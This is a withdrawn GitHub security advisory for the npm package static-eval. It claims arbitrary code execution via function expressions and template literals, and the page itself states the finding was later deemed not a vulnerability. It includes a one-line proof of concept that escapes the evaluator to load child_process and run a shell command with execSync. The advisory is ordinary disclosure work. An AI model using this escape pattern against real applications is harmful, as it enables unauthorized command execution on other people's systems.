Withdrawn: Arbitrary Code Execution in static-eval
Critical severity
GitHub Reviewed
Published
May 6, 2021
to the GitHub Advisory Database
•
Updated Feb 1, 2023
Withdrawn
This advisory was withdrawn on May 4, 2021
Description
Published by the National Vulnerability Database
Feb 11, 2021
Reviewed
Mar 18, 2021
Withdrawn
May 4, 2021
Published to the GitHub Advisory Database
May 6, 2021
Last updated
Feb 1, 2023
All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast)
WITHDRAWN
This was deemed not a vulnerability. See this issue for details.
References